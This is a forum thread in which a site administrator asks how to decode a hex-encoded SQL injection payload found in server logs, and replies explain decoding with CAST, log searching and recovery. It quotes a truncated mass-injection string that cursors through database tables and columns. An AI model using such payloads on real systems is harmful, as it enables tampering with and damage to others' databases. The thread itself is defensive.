I'm finally winning against the script injection attacks.

How can I convert the below gibberish into code I can understand?
I'd like to know what they are throwin' at me.

title=A&bt=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C40432056415
2434841522832353529204445434C415245205461626C655F437572736F7220
435552534F5220464F522053454C45435420612E6E616D652C622E6E616D6520
46524F4D207379736F626A6563747320612C737973636F6C756D6E7320622057
4845524520612E69643D622E696420414E4420612E78747970653D27752720414
E442028622E78747970653D3939204F5220622E78747970653D3335204F52206...

thanks

Take a look at the following article, it explains in details this type of
SQL injection attack:
http://blogs.technet.com/neilcar/archive/2008/03/15/anatomy-of-a-sql-injection-incident-part-2-meat.aspx

HTH,

Plamen Ratchev
http://www.SQLStudio.com

FWIW here's a translation of what you posted:

DECLARE @S VARCHAR(4000);SET @S='DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects
a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35
OR ...

Hackers + Dynamic SQL + Cursors ==> Wow.  The best of all possible worlds.

--

========
Michael Coles
http://www.amazon.com/Pro-SQL-Server-2008-XML/dp/1590599837/

OK... much appreciated... but how did you translate?
thanks

I just did a SELECT CAST(<insert binary string here> AS VARCHAR(MAX)).  You
were probably getting gibberish if you were trying to convert the exact
string you posted since it has an odd number of characters.  Delete the 6
from the end and try again.

--

========
Michael Coles
http://www.amazon.com/Pro-SQL-Server-2008-XML/dp/1590599837/

Take a look here
http://sqlblog.com/blogs/denis_gobo/archive/2008/06/25/7491.aspx


Denis The SQL Menace
http://www.lessthandot.com/
http://sqlservercode.blogspot.com
http://sqlblog.com/blogs/denis_gobo/default.aspx


15245204=AD054205641524348415228323535292C40432056415

You could try...

PRINT CAST(0x4445434C415245204=AD
054205641524348415228323535292C40432056415
2434841522832353529204445434C415245205461626C655F437572736F7220
435552534F5220464F522053454C45435420612E6E616D652C622E6E616D6520
46524F4D207379736F626A6563747320612C737973636F6C756D6E7320622057
4845524520612E69643D622E696420414E4420612E78747970653D27752720414
E442028622E78747970653D3939204F5220622E78747970653D3335204F52206...

AS VARCHAR(8000))

=2E..to see what it's converts to in VARCHAR.

-Eric Isaacs

I used your sample below to decode.

How can I encode the following: 

So I can make it easier to find the entry in the logs? They're hittin' my
server through a dozen sites all day long. I've go them down to 95%
failures. But I still get that one that gets through and I need to find
which page is being assaulted. It would be easier if I could search for the
exact encoded characters.

thanks
================================

You could try...

PRINT CAST(0x4445434C415245204­
054205641524348415228323535292C40432056415
2434841522832353529204445434C415245205461626C655F437572736F7220
435552534F5220464F522053454C45435420612E6E616D652C622E6E616D6520
46524F4D207379736F626A6563747320612C737973636F6C756D6E7320622057
4845524520612E69643D622E696420414E4420612E78747970653D27752720414
E442028622E78747970653D3939204F5220622E78747970653D3335204F52206...

AS VARCHAR(8000))

...to see what it's converts to in VARCHAR.

-Eric Isaacs

SELECT CAST('' AS
VARBINARY)

You could also convert/cast the binary to string and search that
result for it as well.

Make sure that the infected fields aren't truncated too.  Some of
these SQL injection attacks truncated data when they appended the
scripts.  So you may have lost data as well, and removing the scripts
won't fix everything.  A DB backup may be the only way to fix some of
them.

-Eric Isaacs